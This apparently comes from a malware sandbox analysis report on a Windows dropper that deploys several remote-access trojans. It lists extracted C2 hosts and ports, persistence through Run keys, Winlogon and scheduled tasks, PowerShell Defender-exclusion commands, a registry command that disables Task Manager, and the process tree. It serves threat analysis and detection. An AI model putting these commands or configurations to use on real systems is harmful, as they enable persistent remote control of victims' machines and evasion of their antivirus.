Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
12/08/2024, 01:07
General
-
Target
41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe
-
Size
6.7MB
-
MD5
713e742f7314ca8d684137f996540b4b
-
SHA1
1d88ed5170efab2d32d83341be56e1b9f6720d7c
-
SHA256
41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5
-
SHA512
df373f00d609666811494d31c48f030e15155ddd4c3ccd4f0ef734a0eb4bee074244e8bb73263f06edca3cef60db37f7f603e98b7c040b6741dbcf8270fa90e4
-
SSDEEP
98304:tbqknnTC8vHM8aKN+3v4FOjfU2TNe7vWL26AaNeWgPhlmVqkQ7XSKUR83B:tzO8vH04FmMnG4S03B
Malware Config
Extracted
quasar
1.4.1
Office04
businesses-eric.gl.at.ply.gg:55282
ebfbd873-38ee-4f7b-bfe9-2b77cdff1c45
-
encryption_key
361A99FCBAEDCD5C706B5E52C37C90BFB4E13FB2
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
xworm
projects-pf.gl.at.ply.gg:55284
wiz.bounceme.net:6000
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Extracted
asyncrat
0.5.8
Default
thing-wine.gl.at.ply.gg:55280
EFhpy3TPM7sR
-
delay
3
-
install
true
-
install_file
Ass.exe
-
install_folder
%Temp%
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023431-52.dat family_xworm behavioral2/memory/3880-57-0x00000000003A0000-0x00000000003BA000-memory.dmp family_xworm behavioral2/memory/3880-236-0x000000001AF30000-0x000000001AF3E000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\AudioDriver.exe\", \"C:\\Users\\Admin\\Contacts\\smss.exe\", \"C:\\ChainPortsessionbroker\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\AudioDriver.exe\", \"C:\\Users\\Admin\\Contacts\\smss.exe\", \"C:\\ChainPortsessionbroker\\Registry.exe\", \"C:\\Windows\\CbsTemp\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\AudioDriver.exe\", \"C:\\Users\\Admin\\Contacts\\smss.exe\", \"C:\\ChainPortsessionbroker\\Registry.exe\", \"C:\\Windows\\CbsTemp\\RuntimeBroker.exe\", \"C:\\Users\\Public\\AccountPictures\\wscript.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\AudioDriver.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\AudioDriver.exe\", \"C:\\Users\\Admin\\Contacts\\smss.exe\"" Fontsession.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2456 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2872 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2464 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2132 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1348 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 980 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4372 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4852 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3720 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1260 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3544 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4804 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1656 4828 schtasks.exe 110 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3132 4828 schtasks.exe 110 -
Quasar payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023430-48.dat family_quasar behavioral2/memory/3980-55-0x0000000000400000-0x0000000000AB3000-memory.dmp family_quasar behavioral2/memory/216-59-0x0000000000F70000-0x0000000001294000-memory.dmp family_quasar -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x00090000000233cb-4.dat family_asyncrat -
resource yara_rule behavioral2/files/0x000700000002342e-15.dat dcrat behavioral2/memory/3980-55-0x0000000000400000-0x0000000000AB3000-memory.dmp dcrat behavioral2/files/0x0007000000023434-134.dat dcrat behavioral2/memory/1984-135-0x0000000000390000-0x00000000005E2000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 756 powershell.exe 2684 powershell.exe 4652 powershell.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation DCRatStub.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation OrcusStub.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WizWormStub.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation AsyncStub.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation Fontsession.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizWormStub.lnk WizWormStub.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizWormStub.lnk WizWormStub.exe -
Executes dropped EXE 13 IoCs
pid Process 2720 AsyncStub.exe 4028 DCRatStub.exe 3988 OrcusStub.exe 216 QuasarStub.exe 3880 WizWormStub.exe 3640 WindowsInput.exe 3188 Client.exe 1984 Fontsession.exe 3968 AudioDriver.exe 2456 Ass.exe 4904 smss.exe 2780 WizWormStub.exe 2948 WizWormStub.exe -
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AudioDriver = "\"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\AudioDriver.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AudioDriver = "\"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\AudioDriver.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Admin\\Contacts\\smss.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\CbsTemp\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Users\\Public\\AccountPictures\\wscript.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Users\\Public\\AccountPictures\\wscript.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Admin\\Contacts\\smss.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\ChainPortsessionbroker\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\ChainPortsessionbroker\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\CbsTemp\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WizWormStub = "C:\\ProgramData\\WizWormStub.exe" WizWormStub.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\system32\SubDir Client.exe File created C:\Windows\SysWOW64\WindowsInput.exe OrcusStub.exe File created C:\Windows\system32\SubDir\Client.exe QuasarStub.exe File opened for modification C:\Windows\system32\SubDir\Client.exe QuasarStub.exe File opened for modification C:\Windows\SysWOW64\WindowsInput.InstallLog WindowsInput.exe File opened for modification C:\Windows\system32\SubDir QuasarStub.exe File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe File opened for modification C:\Windows\system32\SubDir\Client.exe Client.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\CbsTemp\RuntimeBroker.exe Fontsession.exe File created C:\Windows\CbsTemp\9e8d7a4ca61bd9 Fontsession.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DCRatStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AudioDriver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OrcusStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4724 timeout.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings Fontsession.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings DCRatStub.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 372 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2872 schtasks.exe 4468 schtasks.exe 4372 schtasks.exe 3544 schtasks.exe 4804 schtasks.exe 4184 schtasks.exe 980 schtasks.exe 3720 schtasks.exe 3132 schtasks.exe 1656 schtasks.exe 4000 schtasks.exe 3556 schtasks.exe 4984 schtasks.exe 2132 schtasks.exe 1348 schtasks.exe 1260 schtasks.exe 2456 schtasks.exe 2464 schtasks.exe 4852 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 756 powershell.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 2720 AsyncStub.exe 756 powershell.exe 1984 Fontsession.exe 1984 Fontsession.exe 1984 Fontsession.exe 1984 Fontsession.exe 1984 Fontsession.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 4652 powershell.exe 4652 powershell.exe 4652 powershell.exe 3880 WizWormStub.exe 4904 smss.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe 3968 AudioDriver.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 3880 WizWormStub.exe Token: SeDebugPrivilege 216 QuasarStub.exe Token: SeDebugPrivilege 3188 Client.exe Token: SeDebugPrivilege 756 powershell.exe Token: SeDebugPrivilege 1984 Fontsession.exe Token: SeDebugPrivilege 3968 AudioDriver.exe Token: SeDebugPrivilege 2720 AsyncStub.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 4652 powershell.exe Token: SeDebugPrivilege 3880 WizWormStub.exe Token: SeDebugPrivilege 4904 smss.exe Token: SeDebugPrivilege 2456 Ass.exe Token: SeDebugPrivilege 2456 Ass.exe Token: SeDebugPrivilege 2780 WizWormStub.exe Token: SeDebugPrivilege 2948 WizWormStub.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3188 Client.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 3188 Client.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3968 AudioDriver.exe 3188 Client.exe 3880 WizWormStub.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3980 wrote to memory of 2720 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 86 PID 3980 wrote to memory of 2720 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 86 PID 3980 wrote to memory of 2720 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 86 PID 3980 wrote to memory of 4028 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 87 PID 3980 wrote to memory of 4028 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 87 PID 3980 wrote to memory of 4028 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 87 PID 3980 wrote to memory of 3988 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 88 PID 3980 wrote to memory of 3988 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 88 PID 3980 wrote to memory of 3988 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 88 PID 3980 wrote to memory of 216 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 89 PID 3980 wrote to memory of 216 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 89 PID 3980 wrote to memory of 3880 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 90 PID 3980 wrote to memory of 3880 3980 41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe 90 PID 4028 wrote to memory of 1808 4028 DCRatStub.exe 91 PID 4028 wrote to memory of 1808 4028 DCRatStub.exe 91 PID 4028 wrote to memory of 1808 4028 DCRatStub.exe 91 PID 4028 wrote to memory of 560 4028 DCRatStub.exe 92 PID 4028 wrote to memory of 560 4028 DCRatStub.exe 92 PID 4028 wrote to memory of 560 4028 DCRatStub.exe 92 PID 3988 wrote to memory of 3640 3988 OrcusStub.exe 93 PID 3988 wrote to memory of 3640 3988 OrcusStub.exe 93 PID 216 wrote to memory of 4184 216 QuasarStub.exe 95 PID 216 wrote to memory of 4184 216 QuasarStub.exe 95 PID 216 wrote to memory of 3188 216 QuasarStub.exe 97 PID 216 wrote to memory of 3188 216 QuasarStub.exe 97 PID 1808 wrote to memory of 4900 1808 WScript.exe 98 PID 1808 wrote to memory of 4900 1808 WScript.exe 98 PID 1808 wrote to memory of 4900 1808 WScript.exe 98 PID 3880 wrote to memory of 756 3880 WizWormStub.exe 100 PID 3880 wrote to memory of 756 3880 WizWormStub.exe 100 PID 4900 wrote to memory of 1984 4900 cmd.exe 102 PID 4900 wrote to memory of 1984 4900 cmd.exe 102 PID 3188 wrote to memory of 3556 3188 Client.exe 103 PID 3188 wrote to memory of 3556 3188 Client.exe 103 PID 3988 wrote to memory of 3968 3988 OrcusStub.exe 105 PID 3988 wrote to memory of 3968 3988 OrcusStub.exe 105 PID 3988 wrote to memory of 3968 3988 OrcusStub.exe 105 PID 2720 wrote to memory of 4140 2720 AsyncStub.exe 106 PID 2720 wrote to memory of 4140 2720 AsyncStub.exe 106 PID 2720 wrote to memory of 4140 2720 AsyncStub.exe 106 PID 2720 wrote to memory of 4056 2720 AsyncStub.exe 108 PID 2720 wrote to memory of 4056 2720 AsyncStub.exe 108 PID 2720 wrote to memory of 4056 2720 AsyncStub.exe 108 PID 4140 wrote to memory of 4984 4140 cmd.exe 111 PID 4140 wrote to memory of 4984 4140 cmd.exe 111 PID 4140 wrote to memory of 4984 4140 cmd.exe 111 PID 4056 wrote to memory of 4724 4056 cmd.exe 112 PID 4056 wrote to memory of 4724 4056 cmd.exe 112 PID 4056 wrote to memory of 4724 4056 cmd.exe 112 PID 3880 wrote to memory of 2684 3880 WizWormStub.exe 128 PID 3880 wrote to memory of 2684 3880 WizWormStub.exe 128 PID 1984 wrote to memory of 4536 1984 Fontsession.exe 130 PID 1984 wrote to memory of 4536 1984 Fontsession.exe 130 PID 4900 wrote to memory of 372 4900 cmd.exe 132 PID 4900 wrote to memory of 372 4900 cmd.exe 132 PID 4900 wrote to memory of 372 4900 cmd.exe 132 PID 4536 wrote to memory of 2776 4536 cmd.exe 133 PID 4536 wrote to memory of 2776 4536 cmd.exe 133 PID 3880 wrote to memory of 4652 3880 WizWormStub.exe 135 PID 3880 wrote to memory of 4652 3880 WizWormStub.exe 135 PID 3880 wrote to memory of 4000 3880 WizWormStub.exe 139 PID 3880 wrote to memory of 4000 3880 WizWormStub.exe 139 PID 4056 wrote to memory of 2456 4056 cmd.exe 141 PID 4056 wrote to memory of 2456 4056 cmd.exe 141 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe"C:\Users\Admin\AppData\Local\Temp\41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\AsyncStub.exe"C:\Users\Admin\AppData\Local\Temp\AsyncStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Ass" /tr '"C:\Users\Admin\AppData\Local\Temp\Ass.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Ass" /tr '"C:\Users\Admin\AppData\Local\Temp\Ass.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB575.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4724
-
-
C:\Users\Admin\AppData\Local\Temp\Ass.exe"C:\Users\Admin\AppData\Local\Temp\Ass.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatStub.exe"C:\Users\Admin\AppData\Local\Temp\DCRatStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainPortsessionbroker\QV4mcYA2Sc8KOpCoQlEXh.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ChainPortsessionbroker\G0RgA51UzNSlvJ.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\ChainPortsessionbroker\Fontsession.exe"C:\ChainPortsessionbroker\Fontsession.exe"5⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3FZpp5vCKE.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:2776
-
-
C:\Users\Admin\Contacts\smss.exe"C:\Users\Admin\Contacts\smss.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:372
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainPortsessionbroker\file.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:560
-
-
-
C:\Users\Admin\AppData\Local\Temp\OrcusStub.exe"C:\Users\Admin\AppData\Local\Temp\OrcusStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3640
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3968
-
-
-
C:\Users\Admin\AppData\Local\Temp\QuasarStub.exe"C:\Users\Admin\AppData\Local\Temp\QuasarStub.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4184
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe"C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
